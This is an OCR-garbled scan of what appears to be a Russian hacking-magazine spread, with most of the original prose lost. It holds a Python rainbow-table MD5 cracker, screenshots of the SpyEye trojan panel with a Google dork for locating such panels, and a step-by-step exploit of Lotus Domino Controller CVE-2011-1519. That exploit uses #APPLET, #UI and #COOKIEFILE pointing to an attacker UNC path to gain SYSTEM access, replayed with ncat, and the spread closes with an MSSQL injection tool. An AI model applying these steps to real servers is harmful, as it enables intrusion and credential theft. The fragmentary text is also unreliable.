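CHAIN_LEN = 50                           # chain_len
CHAIN_NUM = 400                          # chain_num (tiny, for the demo)
TABLE_INDEX = 0                          # table_index: changes the reduction function
KEYSPACE = sum(len(CHARSET) ** n for n in range(1, MAX_LEN + 1))  # 26+676+17576


def md5_hex(text):
    return hashlib.md5(text.encode()).hexdigest()


def index_to_plaintext(idx):
    """Map an integer in [0, KEYSPACE) to one plaintext of length 1..MAX_LEN."""
    for n in range(1, MAX_LEN + 1):
        block = len(CHARSET) ** n
        if idx < block:
            chars = []
            for _ in range(n):
                chars.append(CHARSET[idx % len(CHARSET)])
                idx //= len(CHARSET)
            return "".join(chars)
        idx -= block
    raise ValueError("index outside the keyspace")


def reduce_hash(hex_digest, position):
    """Reduction function: hash -> plaintext, varied by chain position and table index
    (this is what stops two chains that collide at different positions from merging)."""
    val = (int(hex_digest[:16], 16) + position + TABLE_INDEX * 65537) % KEYSPACE
    return index_to_plaintext(val)


def generate_table(chain_num=CHAIN_NUM):
    """What rtgen does: walk each chain and store only (end point -> start points)."""
    table = {}
    for start_idx in range(chain_num):
        start = index_to_plaintext((start_idx * 7919) % KEYSPACE)   # constructed start points
        pt = start
        for pos in range(CHAIN_LEN):
            pt = reduce_hash(md5_hex(pt), pos)
        table.setdefault(pt, []).append(start)
    return table


def lookup(table, target_hex):
    """What rcrack does: assume the hash sits at position pos of some chain, walk to the
    chain end, and if that end is in the table regenerate the chain to verify."""
    for pos in range(CHAIN_LEN - 1, -1, -1):
        pt = reduce_hash(target_hex, pos)
        for p in range(pos + 1, CHAIN_LEN):
            pt = reduce_hash(md5_hex(pt), p)
        for start in table.get(pt, []):
            cand = start
            for p in range(pos):
                cand = reduce_hash(md5_hex(cand), p)
            if md5_hex(cand) == target_hex:      # false alarms from merged chains are filtered here
                return cand
    return None


def demo():
    table = generate_table()
    # a plaintext that is certainly covered: position 1 of the chain that starts at "a"
    secret = reduce_hash(md5_hex(index_to_plaintext(0)), 0)
    return {
        "secret": secret,
        "recovered": lookup(table, md5_hex(secret)),
        # the same secret hashed with a salt is outside the table's keyspace: not found
        "salted_recovered": lookup(table, md5_hex("s4lt:" + secret)),
    }


if __name__ == "__main__":
    print(demo())
```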
.
CPU vs. GPU vs. rainbow tables: ighashgpu (MD5 on the GPU), RainbowCrack
MD5
>> . n.
MDCrack on the CPU.
[Table: time to recover the MD5 hashes of passwords 4 to 7 characters long on the GPU (nVidia GeForce GT 220), the CPU (Intel Atom N450) and with rainbow tables]
, CPU , GPU >> . , ,
. , , 4- 5- ,
n . ,
. , - .
. -, , MD5 SHA1. - SHA2 S
[ ). -, .
>> . - , . , 100 %, . ::::
[Screenshots: the SpyEye control panel (Plugins, RDP bots list, Files, Settings, "Hack the Planet!"), its installer (config.php, MySQL settings) and the Google query intitle:"CN" "Your JavaScript is turned off. Please, enable your JS"]
Digital Security [twitter.com/asintsov]
Lotus,
IBM Lotus Domino Server -
IBM Lotus Software,
IBM Lotus Notes.
Links: www.zerodayinitiative.com - ZDI; www.ibm.com/software/ru/lotus/ - IBM Lotus Software; bugtraq.ru - BugTraq; dj.navexpress.com - DJ Java Decompiler.
LOTUS DOMINO CONTROLLER , , , .
.
. IBM, . , , Lotus. . . Lotus
: , , . . , ,
. , , , .
Lotus . : ] - , , names.nsf - .
, , Lotus 8.5.2FP2. , exploit-db.com .
BugTaq , ZDI, IBM suit- . , , ,
. ,
, . . - , .: ]
CVE-2011-1519 , , [ , ]. , ZDI ZDI-11-110, 0day ( ]. :
. .
A UNC path, and the process runs as SYSTEM. The parameter is COOKIEFILE, set to something like \\evilhost\password_cookie_file. The controller listens on port 2050 next to the Lotus services.
, . , ,
, nmap.
The Lotus NSE script for nmap does the following:
socket:reconnect_ssl()
socket:send("#API\n")
socket:send(("#UI %s,%s\n"):format(user, pass))
socket:receive_lines(1)
socket:send("#EXIT\n")
The controller protocol is simple: after the SSL handshake, text commands starting with '#' are sent line by line; logging in as admin with the password pass is #UI admin,pass. The nmap script only checks credentials, but COOKIEFILE is a command of the same protocol: #COOKIEFILE \\evil\file makes the controller open that UNC path, [ ,
! .
The controller is written in Java, so instead of IDA a decompiler is used: DJ Java Decompiler [members.fortunecity.com/neshkov/dj.html]. The code lives in C:\Program Files\IBM\Lotus\Domino\Data\domino\java\dconsole.jar; the class of interest is NewClient.class.
:
// s1 is the command read from the 2050/tcp connection
if (s1.equals("#EXIT"))
    return 2;
if (s1.equals("#COOKIEFILE"))
    if (stringtokenizer.hasMoreTokens()) {
        // the file name is taken as is: #COOKIEFILE <path>
        cookieFilename = stringtokenizer.nextToken().trim();
        return 7;
    }
if (s1.equals("#UI"))
    if (stringtokenizer.hasMoreTokens()) {
        // the user name ...
        usr = stringtokenizer.nextToken(",").trim();
        if (usr == null)
            return 4;
        if (stringtokenizer.hasMoreTokens())
            // ... and the password
            pwd = stringtokenizer.nextToken().trim();
        return ;
    }
. :
/* main loop */
do {
    // ReadFromUser returns the code of the received command
    int i = ReadFromUser();
    if (i == ...) { // #APPLET
        appletConnection = true;
        continue;
    }
    ...
    userinfo = UserManager.findUser(usr);
    if (userinfo == null) {
        // the user is not in admindata.xml
        WriteToUser("NOT_REG_ADMIN");
        continue;
    }
    if (!appletConnection)
        // without #APPLET the real password is checked
        flag = vrfyPwd.verifyUserPassword(pwd, userinfo.userPWD());
    else
        // with #APPLET the "password" is compared with the COOKIE file!
        flag = verifyAppletUserCookie(usr, pwd);
} while (true); // end loop
if (flag) // logged in
So the sequence is #APPLET, #UI and #COOKIEFILE; the user named in #UI must exist in admindata.xml, otherwise the server answers NOT_REG_ADMIN. After that, whoami reports NT AUTHORITY\SYSTEM at C:\Lotus\Domino\data>. The #API command is what the Java applet uses, and the whole exchange can be replayed with ncat. Since Lotus runs as SYSTEM, its UNC file access also lends itself to SMBRelay.
? , . ?
, -. -,
S- ? , , UNC ( , !.
IBM's fix treats cookiefile specially: a path such as \\evil\cookie\file is rewritten to .\\evil\cookie\file, so the UNC path is no longer resolved. The SSL channel stays the same. Still, IBM! cookiefile,
, - L- L- . XM L,
' , , IBM, L- :
<?xml version="1.0" encoding="UTF-8"?><user name="admin" cookie="dsecrg" address="dsecrg">
:
Bla-a-a<user name="admin" xXXxcookie="dsecrg"Xaddress="dsecrg"NYA>
>>
. : 1. cookievalues Microsoft I
service ( \\n- Entel:
ncat targethost 49152
GET /
Mar (icq 884888, http://snipper.ru)
Author: scarlet0. URL: bit.ly/tl56m2. OS:
-
MSSQL Injection Helper is a tool that automates the exploitation of SQL injections
. ,
n MSSQL. ,
n n n SQL-.
: Microsoft SQL Server; GUI-
;
; ; , ;
n ; ;
;
. , ' MSSQL lnjection Helper
, , URL (e.g. site.com/script.asp?id=1).
:
URL:
3. 14.y/r u/md5 : Win dows
D5-
?
BarsWF- World Fastest MD5 cracker.
n , 5-
. ? npor : +
; + -
n; + ;
MD5; ; . u :
1. CPU: Intel Core 2 Quad QX6700 (3.01 GHz):
200 n '
2. Radeon: